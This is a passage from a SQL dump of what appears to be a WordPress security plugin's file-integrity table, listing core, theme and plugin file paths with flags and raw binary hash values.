9���Yp;:���N�','uL;�ީݒ<�sby\r7J�V����5[*ZzK��','',0,'?'),('n��39�l�B03���l','wp-content/themes/nirvana/js/jqueryui/css/ui-lightness/images/ui-icons_222222_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�涐*@����cy�Gu%','�\r%��\"��Xc}���|�}�Ġ�\n�ňh^g�,!','',0,'?'),('n��gv/\n�۟��Z:�','wp-content/themes/alpha-store/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C:LRH{�����','!����a+�[�H9��I�_�Лܯ;��|H�','',0,'?'),('n٢��7�燥��x�','wp-content/plugins/wordpress-seo/admin/class-pointers.php',0,'�?��`�\r��x�','�?��`�\r��x�','?(o�2�)�����|�������q�g�C�','',0,'?'),('n۹`��T�t�,��~','wp-content/themes/hueman/assets/front/js/jquery-plugins/jqueryaddDropCap.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4�6w�^�֌�x��x�	','���jD瓘��ഇПs�wƟ�{��-/}B�m�','',0,'?'),('n�к���v�nj=ͮ','wp-admin/includes/class-bulk-plugin-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6/M�<ϋ��vk5','�s�q�<��$�wt���Ҫ�kԇ6�KL�','',0,'?'),('n�B�\'�a��ъq��','wp-content/plugins/unyson/framework/includes/option-types/datetime-range/class-fw-option-type-datetime-range.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�WB�=A�\'���\n','�������d�\r���Y��E��c	d��vA','',0,'?'),('n��o�����y���','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>�����_�\n\Zt','>��M�,��A���a���k��\0�m,�D��','',0,'?'),('n�N�eq0{h��o�0','wp-content/plugins/unyson/framework/static/libs/font-awesome/fonts/fontawesome-webfont.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l���Q��Q�XF���','�5ɮ��H󆛌\0�{�0��Q�<�u���x','',0,'?'),('n�N����k�O?�','wp-content/themes/precious-lite/images/top.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���T��b�� ��<c','�k���3��Su\ZN���L*�d]�Ә','',0,'?'),('n,�Q���3b��O','wp-includes/js/dist/warning.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*[H$�i��$F���ۅ','B��i���\Z\n%$~i�^i�=������#�h�','',0,'?'),('n���0�9j�v8�\"','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','׭_�s?8f,ؔa��','��ۂ5سq\'ԟ*�.F�Č�կ�ͻ�+\rSI�','',0,'?'),('n��ۗ��vXH)�','wp-includes/sodium_compat/src/Core32/Curve25519/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y��ϛ�vj��\n���','�S�x�^�V>m�!-�q���D�eV�����','',0,'?'),('n�ѲUg��2Ӷ>��w','wp-content/themes/nirvana/languages/pl_PL.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�\0���i\00B��Φ�M','�?,��a\Z�i�ĉ�[5G���_� ���h�M','',0,'?'),('o!#���c�2���^�','wp-content/plugins/all-in-one-wp-migration/lib/view/export/advanced-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\n�ګ�\Z��@)�}�',';I糜I,V�c�Eg���ҳ\r���&���s�ܡ','',0,'?'),('o\'RD-��\0���o��','wp-content/plugins/wordfence/images/support.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Cl�$��r����n<.','��$�M��Ԯ�&���(ᩘs��^	Ϣ*N��','',0,'?'),('o1i�L5���z�$��7','wp-content/plugins/wordfence/modules/login-security/classes/model/compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u1��\\�8���;#j-','P����|�l�_���Z��3z<NɧK���','',0,'?'),('o;�����!2�y','wp-content/plugins/all-in-one-wp-migration/lib/view/assets/css/updater.min.rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?p��>5�E�H2H','�� E$���жΉG:����,Gظ�XT-l','',0,'?'),('oC�\"���Q���t��y','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��+�����%','�4!��H�:�6>�lE��Ec#���a{�A�{','',0,'?'),('oNc2�r�\\�x��RoO�','wp-content/themes/supernews/acmethemes/hooks/footer.php',0,'��M~��?�	!i�Q','��M~��?�	!i�Q','�[-���3Ӻ�{,?R;W,H�&�r��,\'�','',0,'?'),('oP�c����o�.�r','wp-includes/js/tinymce/skins/lightgray/img/object.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�rdP�E}u\n/M�A�� ','��#;!��I��.�>�uʍ�SV��m{|�e-','',0,'?'),('oS]�~(��7;�\r�','wp-includes/js/dist/shortcode.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q	��٪��Ax���<\n','6��m\"(XEG�C�WV�8Y�}(<�2\"��sO','',0,'?'),('oU���ċL^ą�09�','wp-content/themes/verbosa/includes/main.php',0,'�KLk��GlS�m�L�','�KLk��GlS�m�L�','�=�E2LML�ox�p��}�\r��7m^��}?N','',0,'?'),('oZ0�������<c�0','wp-includes/SimplePie/IRI.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n��9,�zӄycE�','Ye��k����\Zk�t~�n4�&�����p#�Ӝ','',0,'?'),('oyq�E�P����a��','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/column/includes/template-component/init.php',0,'�g�Y-�b�Cm�ic^�','�g�Y-�b�Cm�ic^�','�t�ߔ�����R�\\���1�/�S���9��p','',0,'?'),('o}�C܊8�E��G�','wp-content/plugins/wordfence/views/scanner/site-cleaning-high-sense.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rW�+�`Akæ�V r','U���mְ�E2�e�Io�#�z^aŁ���$G�','',0,'?'),('o�m&�V���9�RD��','wp-content/themes/relia/template-parts/content-blog.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','YZ���Aô����x','?CY )(ƙˮ�\r~X�i�<�<+���y�Еal','',0,'?'),('o�)%OAk\"a��e��','wp-content/plugins/unyson/framework/extensions/backups/includes/module/tasks/type/class-fw-ext-backups-task-type-files-restore.php',0,'3.��*��f�|`ܰ;','3.��*��f�|`ܰ;','�^hoO+w%��7L�F��� 0���3^�-','',0,'?'),('o�\\oCV����1�z=�','wp-content/themes/fabulous-fluid/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_+��\Z�%iO��b\0�','o�{IQ���;�cI�M~�&q���:)�{���','',0,'?'),('o��i���T��}���','wp-content/themes/fabulous-fluid/js/jquery.cycle/jquery.cycle2.shuffle.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �m4�|�T>?�-l�','c�zic�btr�\\:7R�ɫ�,#���1�O-','',0,'?'),('o���峐-����Ťq','wp-content/themes/hueman/assets/front/img/demo/9-520x245.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8\"P}�D�V�X��J�','������λ/�t��dZM\n.`�a^rþ\\�\";M}','',0,'?'),('o�w*�\nΛ΢GҜ�]','wp-content/plugins/wordfence/modules/login-security/img/header.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p����]�j-����','8�����#̄(8��O�\"�	+h\"Fb��','',0,'?'),('o����F���nbm:8','wp-content/themes/illdy/layout/images/header-logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','AOz�ѵ��!���f','�J��z7�\0�N��L�K�� <��68ɑKX�','',0,'?'),('o�غW���\'�1ا��','wp-content/themes/nirvana/js/nivo.slider.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�\Z6;n05�1','��\"��l}hBW%��]�\0�EN�ep���eB�T','',0,'?'),('o㮚-�;?X:��pҡ','wp-trackback.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����ьWe=]!B��','��\'ߵ���3�M؞Ø��5���c�o�M�U�%','',0,'?'),('o���Y��څ��X�','wp-content/plugins/wordfence/images/flags.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W7� ��(�˿!�\Z7�','Bx�0%Ly�6���!��X\\z/<�n�6=\ZW�','',0,'?'),('o�[��n3u��ʹ�P5','wp-admin/options-general.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��O+�٢���%ڦS�','Y�*7:��!ȡ˦�Ak}���w��2��Z1','',0,'?'),('o�@\0�u��75��}','wp-content/themes/point/images/125x125.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�jO�����U����','ҡ�#�%�̕>X�<\0���?�s�H+:�G�1','',0,'?'),('p�N��H�p�XO�9�','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/column/class-fw-shortcode-column.php',0,'W���CA�$,�y�`�','W���CA�$,�y�`�','A�B��7�V�q9V�e����v��ª%��','',0,'?'),('p��7u�L�_{2Û�','wp-includes/js/jquery/ui/draggable.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J���\\O��Љ/�Hp%','�N��B\0�!8\r���o? �)E�C>��','',0,'?'),('p$�8ι�d9(���)','wp-content/plugins/all-in-one-wp-migration/lib/view/main/translate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<���D\"qL��6�5y2]','w��2�״0�A��8�P.�v ���,�','',0,'?'),('p\nw{���0�	P�Ӷj','wp-content/themes/illdy/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k	Ҩy��+\rD��','v)��g���KBy#���j�h�-Λ�cK_�!◂','',0,'?'),('p�?وU���\0˜','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-cronjob-handler.php',0,'I!o�/@Ojj�)�_0','I!o�/@Ojj�)�_0','����yv�\r�tDMⓨ�ԇ��\\�6�O��M�q','',0,'?'),('p{\r�� �%>/�Z��:','wp-content/plugins/wordfence/views/scanner/issue-base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m|�&vfƲ~��','�i\"��m�$�PyM����d��	���S�','',0,'?'),('p.���`�N`��P+','wp-content/themes/supernews/acmethemes/customizer/options/options-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}83��?kwH����s�','\r=�,$\n���,#��v�EO�|�F@=,�pi#i','',0,'?'),('p:�,�`OlL�(�A','wp-content/plugins/wordfence/views/waf/waf-uninstall-success.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k�~�H���7�<�B��','\0!�F�E���KP��7߻�0��\n;6�}��$','',0,'?'),('p>O	>q/���.f�','wp-content/themes/mh-magazine-lite/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F��M��>��F�C�','��I	�-P��\Z����Ţ���/����L�','',0,'?'),('p@�\\nb�41�~��','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/icon-box/static.php',0,'X$� ��!�J�m��F��','X$� ��!�J�m��F��','\0��Ӧ���?���hW�J�Aq���K�3L6�','',0,'?'),('pBm΢~B�~�=/ጩ','wp-content/plugins/spam-captcha/core/css/popup_admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|�M��-@v�%','D|l�=\"�+7\r���5�@�E��N���o��X','',0,'?'),('pB���e�Gߴ^���R�','wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.structure.min.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)/4;�$۔�ެvi\\','�n���i��뗅�N�vX�7�Y]�����D','',0,'?'),('pEU�T���\Z!uZ��D�','wp-content/themes/panoramic/library/js/jquery.carouFredSel-6.2.1.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���4�MF�9B��','�+�i�\Z�X��0�N�1�X��q�\'�4','',0,'?'),('pI���:S����v��u','wp-content/plugins/contact-form-7/includes/formatting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W���W1��K�[�','��6��)�yG�v��ٯ��cχ%��lZ5�3X','',0,'?'),('pRP�����ݯ�-��A','wp-content/themes/precious-lite/inc/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;T��\'_/���t��','X(0u�i��o��`�p�S�\r�t�>�','',0,'?'),('pU,�:�s.WrCk	�','wp-content/themes/the-minimal/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n+�+\0l��G���l','���CFG��u����6���hO)a���߷�','',0,'?'),('pUy�a	�b��va�;�8','wp-includes/js/comment-reply.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F���D6����x�','!�x��G�����Go�Df�B8xXC�','',0,'?'),('pw��Q�F�c�ߠb*','wp-content/plugins/wordfence/fonts/roboto-KFOmCnqEu92Fr1Mu4mxMKTU1Kg.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@$�qG�2k5$��z�','ֆF*`�\'�O t�riR:�j0��W\Z�=�j��','',0,'?'),('p��.а��[ÍD�','wp-includes/deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[V�j�\Z�ǕY)��j','OV&?��������i���{���8�z^�','',0,'?'),('p�P\0��?R��1��%>�','wp-content/themes/wen-business/assets/css/customizer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���¥Ta�r(D�+W�','\"�b���p�!�/\\qM�)��܌��x0*���K�','',0,'?'),('p��\\*e�\n\rψ��','wp-content/plugins/wordfence/modules/login-security/classes/controller/notices.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z�83�?w�����W','\r.l]\\)	Z�q���p�]_^�u����J\n�%�','',0,'?'),('p̓0�2@��PF�tk','wp-content/plugins/wordfence/views/common/unsubscribe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y:h3�>��a ݑ�4~','E�q����Tg��O>F-��O�(�IƚZ��z','',0,'?'),('p�_uNJ�p#B36�Ce','wp-content/plugins/wordpress-seo/languages/index.php',0,'�H.d�����0%U>','�H.d�����0%U>',',�^Zk��J֏��0)����I��B���l��','',0,'?'),('p����a^\Z�H����','wp-content/themes/clean-magazine/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�䒘��\"\Z-y�+�Y','����*d���V�[5.|_�V�Xr/�螦���','',0,'?'),('p݇��o��$�w}','wp-content/plugins/contact-form-7/languages/contact-form-7-ko_KR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�&\'p���s\Z\nM�','[(B�I<��\n��\0�=�\"����,�Q�F��','',0,'?'),('p�г�w������<}b','wp-content/themes/illdy/layout/js/scripts.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���g�j^�}�*��{�Z','�\\}������L�N���?�?������[-�','',0,'?'),('p�ahH��^뿜����','wp-content/plugins/wordpress-seo/vendor/yoast/api-libs/google/io/Google_CacheParser.php',0,'5���L<<Š{���','5���L<<Š{���','��I��$��m�*�T2&��j�nHV:}[���S�','',0,'?'),('p�(\0�z�`م�\"\r','wp-content/plugins/contact-form-7/languages/contact-form-7-id_ID.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n�i??gT�I\')a�','�:�@������.PR��XA�[���e�Hw�[�`','',0,'?'),('p�}G��J��$��x','wp-includes/block-supports/align.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v(\0����1�i�`','��=o�.�k�4�Ŋ*�P\\������[�','',0,'?'),('p�fo�;H/��aZ�^5,','wp-content/themes/skt-construction-lite/inc/extras.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�颷���x�R���','H�U�,m]��<>\Z!��pJ�����֛�','',0,'?'),('p��~�%lװ��f��','wp-content/themes/point/images/footerlogo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]h&0h�N�i���c�','	Ν}�{��ʐq{������R(!Aƒ�','',0,'?'),('p����b�~�oBk�Z','wp-content/plugins/akismet/class.akismet.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���r���s�~�\'#B','�5��>~�6w��٤�>��������S4�����','',0,'?'),('p�?��~r��Fb�[��^','wp-content/themes/sg-window/inc/js/one-page-nav.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���*��?��;o','vR��S�/ve�`6��R�g.rp�g]�t����','',0,'?'),('p��u�w��S�ɴ0�','wp-content/plugins/hello.php',0,'R���bAo��t!_~�','R���bAo��t!_~�','&�.ݰMZ3yqN�Z��Ӟ�-\\�”T\0U@e�','',0,'1'),('qqC��$�����@','wp-content/plugins/wordfence/views/common/page-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u3�^1!��Gѩ}:�L','8^!c�$u��w�y��)�+	&�&���<�','',0,'?'),('q<@s���z�ƂK��','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/nb.js',0,'9}U���&P\"b���\\a','9}U���&P\"b���\\a','�bz����7D�bA<���YT&�9�LL\n3','',0,'?'),('qs��A�t���d�\\','wp-includes/js/dist/warning.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I�g&CM$�L���','��?<�G�\"��n�~.���: �]��*�6','',0,'?'),('q$�x��|��7\'��','wp-content/themes/nirvana/fonts/sourcesanspro-regular-webfont.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\�O���\0���','8�xEu۾J�uq���^pV��s�۱%��U�','',0,'?'),('q\"�co���>�2Rh�]','wp-admin/includes/plugin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8]���#��m�ʥ�Xy','�~7�E��\0y�/|$��ΰ�)�%煴�bj','',0,'?'),('q/h����荔�4�[','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/section/static.php',0,'?9�&��\"=5��ؔ','?9�&��\"=5��ؔ','�\nc�	]��9F)�Ԃ�l*�ps+=�(��8','',0,'?'),('q4�B�s��/ՙ0E','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/text-block/views/view.php',0,'�\rF�����fD��','�\rF�����fD��','�}�0Y��W�Ɏ��/�m_���Ⱦ���I�','',0,'?'),('q6��@��%����gZ�','wp-content/themes/barletta/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�_� �/�jFNI�','�� �H��$��e�4~�� I��I����~Ċt','',0,'?'),('qC�Q�	�C�M�ljR�','wp-content/themes/wen-business/inc/jetpack.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�wÿ��NJ�k��','�Q��DM;�3�l%i�Kpk�7]T�yj���!+q','',0,'?'),('qL���I�Lc�','wp-includes/class-wp-recovery-mode-link-service.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t���L�c��(Vkʘ��','�W�6qJ��g�t=\0��kS�v�b�g%�<=','',0,'?'),('qQr<P�’��|�����','wp-content/themes/sg-window/img/icons/small/yahoo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w��Bh�!�:��_','ߝ����})l�����Uy^D�:�ď�','',0,'?'),('qU����\'��*�:b','wp-content/themes/verbosa/resources/js/html5shiv.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�D\r)��7c���O','�(��B5s�TP���<pt%�FI4�L�RZ_��Y','',0,'?'),('qXFャ%�3��6F�KD','wp-content/plugins/unyson/framework/helpers/class-fw-cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ՠ��r����,*|','��ɼ3s�������L�_�Ni{�.h?Ɩ&','',0,'?'),('qh�665�y|�=�?S	','wp-includes/js/jquery/jquery.serialize-object.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\)������J�l<�\"','��D{zp�\r]���<������@7>0(��h','',0,'?'),('qo�U���3�G0�F�','wp-content/themes/fluida/admin/images/magazine-3col.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','TGo�0��\'RŷC���','���E�yf0C⛶��iS^wl��a�)?\\��+','',0,'?'),('q��f���EH�7�d�','wp-includes/css/dist/editor/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�jT�09�Ǜ/L�','jlO*�I���\0~u�dR�cѿF��TqY�{�wa�','',0,'?'),('q�^�YD�t;ELN��\n','wp-content/plugins/all-in-one-wp-security-and-firewall/logs/index.html',0,'��ُ\0��	��B~','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('q�s���ƞ�ù��','wp-includes/rest-api/endpoints/class-wp-rest-post-types-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����!�Й�~L�C��','֓�2ǟ��lq�~�<%Z����g����','',0,'?'),('q��F~IfD�ө� xZf','wp-content/plugins/wordfence/css/diff.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','܀g	��	�$���`r�Q','��$��hEJ^54<$�ӭYc���’�&','',0,'?'),('q����R+�q�\Z�2�','wp-includes/js/dist/edit-post.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�\\e���[��G.�װ','b�kS|�\0��g�^�/3WL���%�(���/�','',0,'?'),('q�0���������5','wp-includes/sodium_compat/src/Core32/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5O&?��E�	��%','^%%�hT��,�����k2�Ȯn=n%:��','',0,'?'),('q�~�k=�ph��Q�','wp-content/themes/verbosa/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ޣ.�x��>)JPW�','�B�mi����ecM����Ԓ~F��T�Ko\'�','',0,'?'),('q���*��$,|ߣ','wp-content/themes/hueman/assets/front/fonts/fontawesome-webfont.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]%����5ptHg�','��E4.t)�|(7��J���>n;\Z^��h\nØ','',0,'?'),('q��5@�*=�&��\\X�','wp-content/plugins/wordfence/lib/wfHelperBin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��!�ȍ��4Q��X#','��չ%-�^�q��U�q�M��eY���','',0,'?'),('q��7I0V\\�68��E','wp-content/themes/square/template-parts/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#Z}��g��u�!\0��','��bZ/I�J�+##/��Ύ���b\'�5g','',0,'?'),('q��^2���Al��','wp-content/themes/sg-window/inc/js/sidebar.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`h�U��z��csZ�','fC9��H\'6vz�)�voiף����;�U�|r�','',0,'?'),('q�$\'6�e��-W]','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/PHP52/SplFixedArray.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nb�x	��BC��?���\Z','��e��C8�&\r����h\r��2w�(^Й�V\0','',0,'?'),('q�%��\0�j]��3','wp-content/plugins/unyson/framework/static/libs/selectize/selectize.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|�O����-��n','���!!��9�SAzs�K���(�Ir��1Б','',0,'?'),('q��K��M�-����&','wp-content/plugins/unyson/framework/includes/option-storage/type/class-fw-option-storage-type-post-meta.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-�)>��E��Q\ZT','I�Ay��8W�H;ZRΰY�4�]��9ߥ��?6k','',0,'?'),('r[��s2<�����u','wp-content/themes/twentytwentyone/assets/sass/06-components/posts-and-pages.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g<Q�P�;�z��[Ѩɹ','����j�Qo���<>�\n��Y�����g1�b','',0,'?'),('r��h��v��Lk/��','wp-admin/network/upgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q#��ԑ��\Z;f��','��3PJݎ��Y��b�GqA��8œo:?��>�','',0,'?'),('r\"��[_/ީ;<�Zj','wp-content/themes/relia/inc/customizer/panel-general.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���(x�E&=j�m_�','�R6`�&�a��5�{X�\ZF��U%��@r��','',0,'?'),('r$zj1�����U��<\Z','wp-content/themes/illdy/layout/css/custom.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�SSå|�6��;_�]�','�y�)X����D����l�y�^g0Jp߂C�t`','',0,'?'),('r+zk;� 4��WI','wp-includes/js/tinymce/themes/modern/theme.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(3�o�U�2ŝU�2�','�2.�pt�\"r�`)��\r.C�l�\\\Z��BIX','',0,'?'),('rI\0yg�E!���2\0C','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503-lockout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P����mx�f�4	\"','���H&�(hn�U�-z$���&��Egj[�M�','',0,'?'),('rL��lT��%x�P�\"','wp-content/plugins/unyson/framework/extensions/shortcodes/includes/coder/interface-fw-ext-shortcodes-attr-coder.php',0,'��<�L�f�ȣFq^u','��<�L�f�ȣFq^u','��B�<N�e8~.��`���{�1�DE\nTl�','',0,'?'),('re\"��)�{ y�?p\n�','wp-content/themes/alpha-store/fonts/fontawesome-webfont.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|��\n�\rcϸ�?�9','�j%-�����!�ԟ���wf�T-&�}?�','',0,'?'),('re��\'۷�11d��8�','wp-content/themes/twentytwentyone/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'80e3ԃO�[{��','��8q3�[N����fGvу!�Ec���7��','',0,'?'),('rt�IŒg[��;���?','wp-includes/sodium_compat/namespaced/Core/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rV�N�ck0�}/�Ճ�','n�K��kZ��	���� N$ � EК���e�$','',0,'?'),('rz}0�%A������#','wp-content/themes/wen-business/assets/css/customizer.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|��1�%	d\\�*�(','w#�Q��|���6�����9�iw)�&','',0,'?'),('r��)����d��RD�2','wp-content/plugins/wordfence/js/wfdashboard.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Խ�P����`�{i�','=P�z�r���!�?w\Z�/d!��LӪ��1!�','',0,'?'),('r�_Q�]�$Av��\rt','wp-content/themes/the-minimal/template-parts/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*Z\rF!-PQb����','���#\'�b,K�KݕtJ*��hg�+wZ�a�','',0,'?'),('r�(n՞���j��b\"','wp-admin/js/media.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DVq�~�6H�Ͽ;Y�','=�%v��Fү�h�\\����	#�Ҕ�\Z�f','',0,'?'),('r��O�r\0�C<o�b#�j','wp-content/plugins/all-in-one-wp-security-and-firewall/wp-security.php',0,'�D8�h~��e����2','�D8�h~��e����2','T`אH����@�r\Z��N\0��~g��Z@���','',0,'?'),('r�wpZ*��yU�g','wp-content/themes/tortuga/css/genericons/genericons.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P\r�6��Xw��x�M',')��@ �ѵv�P�4\\W*Y�\'�-c�|����','',0,'?'),('r�2Á�Xzeb��/���','wp-content/themes/twentyseventeen/template-parts/footer/site-info.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Aj\'�--Ldh�qX<�\"�','#�Iwz�{�t5���ma���: ���Q��','',0,'?'),('r�M=�.�C�B���Z','wp-content/themes/sg-window/publication/archive.php',0,'�Lj~6Ƌ��','�Lj~6Ƌ��','���E�p~����+�}�ap2`���=�\\�c','',0,'?'),('r����Dž��iŪ>','wp-content/themes/the-minimal/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ra�^�\'pso2�','���<�|�{(\Z��ۧ�#�2z2��\".��E','',0,'?'),('r��m0�_4�6n����','wp-content/themes/verbosa/admin/css/admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ͻ��l{Ts�/�Ot�','d�Ƥ�~��\ne`�\Z�BC�\05\Z\\9jS���','',0,'?'),('r���ɑ���um�v','wp-content/themes/square/inc/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O�BA\\��1�+��','��n��f(���L��I